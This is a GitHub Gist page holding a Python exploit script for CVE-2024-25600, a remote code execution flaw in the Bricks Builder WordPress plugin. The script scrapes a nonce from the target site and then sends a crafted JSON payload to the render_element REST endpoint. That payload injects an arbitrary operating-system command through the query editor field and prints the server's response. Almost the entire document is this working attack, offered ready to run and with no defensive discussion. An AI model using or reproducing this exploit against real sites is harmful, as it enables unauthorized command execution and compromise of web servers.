Last active
January 2, 2026 05:00
-
-
Save timsonner/7614e0491a2daa063ccffe8fb9040517 to your computer and use it in GitHub Desktop.
CVE-2024-25600 (Bricks Builder RCE)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2024-25600 (Bricks Builder RCE) | |
| import requests | |
| import sys | |
| import urllib3 | |
| import re | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def fetch_nonce(target_url): | |
| try: | |
| print(f"[*] Retrieving nonce from {target_url}...") | |
| r = requests.get(target_url, verify=False, timeout=10) | |
| r.raise_for_status() | |
| # Regex to find the nonce in the bricks-scripts-js-extra block | |
| # Pattern looks for: "nonce":"<hex_string>" | |
| match = re.search(r"\"nonce\":\"([a-f0-9]+)\"", r.text) | |
| if match: | |
| nonce = match.group(1) | |
| print(f"[+] Nonce found: {nonce}") | |
| return nonce | |
| else: | |
| print("[-] Nonce not found in response.") | |
| return None | |
| except Exception as e: | |
| print(f"[-] Error fetching nonce: {e}") | |
| return None | |
| if len(sys.argv) < 2: | |
| print(f"Usage: python3 {sys.argv[0]} <Target IP/URL> [Command]") | |
| print(f"Example: python3 {sys.argv[0]} https://10.64.186.168 \"whoami\"") | |
| sys.exit(1) | |
| target_ip = sys.argv[1] | |
| cmd = sys.argv[2] if len(sys.argv) > 2 else "id" | |
| # Ensure target has protocol | |
| if not target_ip.startswith("http"): | |
| # Try HTTPS first, then HTTP | |
| print("[*] No protocol specified, trying HTTPS first...") | |
| target = f"https://{target_ip}" | |
| else: | |
| target = target_ip | |
| # 1. Get the nonce automatically | |
| nonce = fetch_nonce(target) | |
| if not nonce and not target_ip.startswith("http"): | |
| # If HTTPS failed, try HTTP | |
| print("[*] HTTPS failed, trying HTTP...") | |
| target = f"http://{target_ip}" | |
| nonce = fetch_nonce(target) | |
| if not nonce: | |
| print("[-] Could not retrieve nonce. Exiting.") | |
| sys.exit(1) | |
| # 2. Prepare the exploit | |
| headers = { | |
| "Content-Type": "application/json" | |
| } | |
| url = f"{target}/wp-json/bricks/v1/render_element" | |
| # Using backticks for JS template literal | |
| query_cmd = "throw new Exception(`" + cmd + "`);" | |
| payload = { | |
| "postId": "1", | |
| "nonce": nonce, | |
| "element": { | |
| "name": "container", | |
| "settings": { | |
| "hasLoop": "true", | |
| "query": { | |
| "useQueryEditor": "true", | |
| "queryEditor": query_cmd, | |
| "objectType": "post" | |
| } | |
| } | |
| } | |
| } | |
| # 3. Send the payload | |
| try: | |
| print(f"[*] Sending payload to {url}...") | |
| r = requests.post(url, json=payload, headers=headers, verify=False, timeout=10) | |
| print("[*] Response:") | |
| print(r.text) | |
| except Exception as e: | |
| print(f"[-] Exploit failed: {e}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment